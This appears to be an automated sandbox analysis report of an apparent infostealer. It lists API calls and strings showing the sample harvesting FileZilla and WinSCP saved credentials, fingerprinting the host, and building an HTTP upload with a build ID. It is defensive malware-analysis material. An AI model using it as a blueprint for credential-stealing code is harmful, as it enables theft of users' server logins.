                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 0018E82C
                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0018E837
                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0018E865
                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0018E870
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0018E8D6
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0018E8EA
                                                                                                                                                                        • lstrlenA.KERNEL32(0018EC91), ref: 0018EA12
                                                                                                                                                                          • Part of subcall function 00196ED9: CreateThread.KERNEL32(00000000,00000000,00196E08,?,00000000,00000000), ref: 00196F78
                                                                                                                                                                          • Part of subcall function 00196ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00196F80
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                                                                                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                        • API String ID: 4146028692-935134978
                                                                                                                                                                        • Opcode ID: 22e426902acfc58ab6e02f18dfeb8ad449620b414e4c2d3246448fd668436280
                                                                                                                                                                        • Instruction ID: 8ede167f96e84dc68711f21f54deb8c8c1f999ef999c5b84e235bc685d1e7792
                                                                                                                                                                        • Opcode Fuzzy Hash: 22e426902acfc58ab6e02f18dfeb8ad449620b414e4c2d3246448fd668436280
                                                                                                                                                                        • Instruction Fuzzy Hash: 8DA12D32D41219ABDF02BBA4EC8A9DD7BB8AF29704F114461F601B7061DB74AF468F91
                                                                                                                                                                        Function 0018E15B Relevance: 56.3, APIs: 18, Strings: 14, Instructions: 325registryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 0018E18C
                                                                                                                                                                        • _memset.LIBCMT ref: 0018E1AC
                                                                                                                                                                        • _memset.LIBCMT ref: 0018E1BD
                                                                                                                                                                        • _memset.LIBCMT ref: 0018E1CE
                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0018E202
                                                                                                                                                                        • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0018E233
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0018E24B
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0018E272
                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0018E292
                                                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0018E2B5
                                                                                                                                                                        • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,001B68D7), ref: 0018E34E
                                                                                                                                                                        • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0018E3AE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset$Value$CloseOpen$Enum
                                                                                                                                                                        • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                        • API String ID: 463713726-2798830873
                                                                                                                                                                        • Opcode ID: 6f5d8e77f9f7287e173d31e2f977c779084159d9268d043ee3e58eeb132fcfbd
                                                                                                                                                                        • Instruction ID: 23a33dc20356cdb165a977024ecb399a72ba054c80b0213297a20d78f017591b
                                                                                                                                                                        • Opcode Fuzzy Hash: 6f5d8e77f9f7287e173d31e2f977c779084159d9268d043ee3e58eeb132fcfbd
                                                                                                                                                                        • Instruction Fuzzy Hash: DDD1B17291012DABEF22EB94DC82AE9B7B8AF14704F1144E7E509B6051DB70BF85CF61
                                                                                                                                                                        Function 00185F39 Relevance: 53.0, APIs: 20, Strings: 10, Instructions: 466networkstringmemoryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 568 185f39-185ffe call 1904ee call 184ab6 call 1904bc * 5 InternetOpenA StrCmpCA 583 186000 568->583 584 186006-18600c 568->584 583->584 585 1866ff-186727 InternetCloseHandle call 188048 584->585 586 186012-18619c call 191c1f call 19059c call 190562 call 182920 * 2 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 19059c call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 19059c call 190562 call 182920 * 2 InternetConnectA 584->586 591 186729-186761 call 19051e call 1905de call 190562 call 182920 585->591 592 186766-1867ec call 182920 * 4 call 181cde call 182920 call 19d05a 585->592 586->585 662 1861a2-1861dc HttpOpenRequestA 586->662 591->592 663 1861e2-1861e8 662->663 664 1866f3-1866f9 InternetCloseHandle 662->664 665 1861ea-186200 InternetSetOptionA 663->665 666 186206-186690 call 1905de call 190562 call 182920 call 19059c call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 19059c call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 19059c call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 19059c call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 19059c call 190562 call 182920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 1a70a0 lstrlenA * 2 call 1a70a0 lstrlenA HttpSendRequestA 663->666 664->585 665->666 809 1866d2-1866ea InternetReadFile 666->809 810 1866ec-1866ed InternetCloseHandle 809->810 811 186692-18669a 809->811 810->664 811->810 812 18669c-1866cd call 1905de call 190562 call 182920 811->812 812->809
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AE8
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AEE
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AF4
                                                                                                                                                                          • Part of subcall function 00184AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00184B06
                                                                                                                                                                          • Part of subcall function 00184AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00184B0E
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00185FD8
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 00185FF6
                                                                                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0018618E
                                                                                                                                                                        • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 001861D2
                                                                                                                                                                        • lstrlenA.KERNEL32(?,",mode,001B78D0,------,001B78C4,df523263f44cc8d55414a260a0197e4a,",build_id,001B78AC,------,001B78A0,",001B7894,------), ref: 001865FD
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0018660C
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00186617
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0018661E
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0018662B
                                                                                                                                                                        • _memmove.LIBCMT ref: 00186639
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00186647
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00186655
                                                                                                                                                                        • _memmove.LIBCMT ref: 00186662
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00186677
                                                                                                                                                                        • HttpSendRequestA.WININET(00000000,?,00000000), ref: 00186685
                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 001866E2
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 001866ED
                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 001866F9
                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00186705
                                                                                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00186200
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                                                                        • String ID: "$"$"$------$------$------$------$build_id$df523263f44cc8d55414a260a0197e4a$mode
                                                                                                                                                                        • API String ID: 3702379033-74871842
                                                                                                                                                                        • Opcode ID: d578a3113e40645e15ce252a2fa6a5a5041d901ffaef9ab68d0aaf1d700d82b3
                                                                                                                                                                        • Instruction ID: ac914e19075e4719dc85943a6dde35ba32b49c1a9e03a7977162d6f4247db24c
                                                                                                                                                                        • Opcode Fuzzy Hash: d578a3113e40645e15ce252a2fa6a5a5041d901ffaef9ab68d0aaf1d700d82b3
                                                                                                                                                                        • Instruction Fuzzy Hash: 7D2263319001699BDF22FB60DC46BCDB774AF29704F4284E2E61977162DB706F8A8F50
                                                                                                                                                                        Function 00193BC6 Relevance: 49.7, APIs: 2, Strings: 26, Instructions: 674stringCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 818 193bc6-1945e5 call 1904bc call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 190c95 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1915a9 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 191659 call 19059c call 190562 call 182920 * 2 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 190977 call 19059c call 190562 call 182920 * 2 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 GetCurrentProcessId call 19221f call 19059c call 190562 call 182920 * 2 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 190b05 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1917dc call 19059c call 190562 call 182920 * 2 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 19196c call 19059c call 190562 call 182920 * 2 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 190c5a call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 190c28 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 191538 call 19059c call 190562 call 182920 * 2 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 190db0 call 19059c call 190562 call 182920 * 2 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 190c95 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 190d03 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 190f26 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 190fdc call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 190f8f call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1910ee call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 191167 call 19059c call 190562 call 182920 * 2 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 19147a call 19059c call 190562 call 182920 * 2 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1911d8 call 19059c call 190562 call 182920 * 2 call 1911d8 call 19059c call 190562 call 182920 * 2 call 1905de call 190562 call 182920 call 181cfd lstrlenA call 1904bc call 196ed9 call 182920 * 2 call 181cde
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                          • Part of subcall function 00190C95: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,001B65B6,?,?,?), ref: 00190CAD
                                                                                                                                                                          • Part of subcall function 00190C95: HeapAlloc.KERNEL32(00000000), ref: 00190CB4
                                                                                                                                                                          • Part of subcall function 00190C95: GetLocalTime.KERNEL32(?), ref: 00190CC0
                                                                                                                                                                          • Part of subcall function 00190C95: wsprintfA.USER32 ref: 00190CEB
                                                                                                                                                                          • Part of subcall function 001915A9: _memset.LIBCMT ref: 001915DC
                                                                                                                                                                          • Part of subcall function 001915A9: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 001915FB
                                                                                                                                                                          • Part of subcall function 001915A9: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 00191620
                                                                                                                                                                          • Part of subcall function 001915A9: RegCloseKey.ADVAPI32(?,?,?,?), ref: 0019162C
                                                                                                                                                                          • Part of subcall function 001915A9: CharToOemA.USER32(?,?), ref: 00191640
                                                                                                                                                                          • Part of subcall function 00191659: GetCurrentHwProfileA.ADVAPI32(?), ref: 00191674
                                                                                                                                                                          • Part of subcall function 00191659: _memset.LIBCMT ref: 001916A3
                                                                                                                                                                          • Part of subcall function 00191659: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 001916CB
                                                                                                                                                                          • Part of subcall function 00191659: lstrcatA.KERNEL32(?,001B6ED4,?,?,?,?,?), ref: 001916E8
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                          • Part of subcall function 00190977: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 001909AA
                                                                                                                                                                          • Part of subcall function 00190977: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001909EA
                                                                                                                                                                          • Part of subcall function 00190977: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00190A3F
                                                                                                                                                                          • Part of subcall function 00190977: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00190A46
                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(Path: ,001B6884,HWID: ,001B6878,GUID: ,001B686C,00000000,MachineID: ,001B685C,00000000,Date: ,001B6850,001B684C,11.1,Version: ,001B65B6), ref: 00193E1B
                                                                                                                                                                          • Part of subcall function 0019221F: OpenProcess.KERNEL32(00000410,00000000,00193E2A,00000000,?), ref: 00192241
                                                                                                                                                                          • Part of subcall function 0019221F: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0019225C
                                                                                                                                                                          • Part of subcall function 0019221F: CloseHandle.KERNEL32(00000000), ref: 00192263
                                                                                                                                                                          • Part of subcall function 00190B05: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00193ED5,Windows: ,001B68A8), ref: 00190B19
                                                                                                                                                                          • Part of subcall function 00190B05: HeapAlloc.KERNEL32(00000000,?,?,?,00193ED5,Windows: ,001B68A8), ref: 00190B20
                                                                                                                                                                          • Part of subcall function 001917DC: __EH_prolog3_catch_GS.LIBCMT ref: 001917E3
                                                                                                                                                                          • Part of subcall function 001917DC: CoInitializeEx.OLE32(00000000,00000000,0000004C,00193F39,Install Date: ,001B68B8,00000000,Windows: ,001B68A8,Work Dir: In memory,001B6890), ref: 001917F4
                                                                                                                                                                          • Part of subcall function 001917DC: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00191805
                                                                                                                                                                          • Part of subcall function 001917DC: CoCreateInstance.OLE32(001B2F00,00000000,00000001,001B2E30,?), ref: 0019181F
                                                                                                                                                                          • Part of subcall function 001917DC: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00191855
                                                                                                                                                                          • Part of subcall function 001917DC: VariantInit.OLEAUT32(?), ref: 001918B0
                                                                                                                                                                          • Part of subcall function 0019196C: __EH_prolog3_catch.LIBCMT ref: 00191973
                                                                                                                                                                          • Part of subcall function 0019196C: CoInitializeEx.OLE32(00000000,00000000,00000030,00193FA7,?,AV: ,001B68CC,Install Date: ,001B68B8,00000000,Windows: ,001B68A8,Work Dir: In memory,001B6890), ref: 00191982
                                                                                                                                                                          • Part of subcall function 0019196C: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00191993
                                                                                                                                                                          • Part of subcall function 0019196C: CoCreateInstance.OLE32(001B2F00,00000000,00000001,001B2E30,?), ref: 001919AD
                                                                                                                                                                          • Part of subcall function 0019196C: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 001919E3
                                                                                                                                                                          • Part of subcall function 0019196C: VariantInit.OLEAUT32(?), ref: 00191A32
                                                                                                                                                                          • Part of subcall function 00190C5A: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00181385), ref: 00190C66
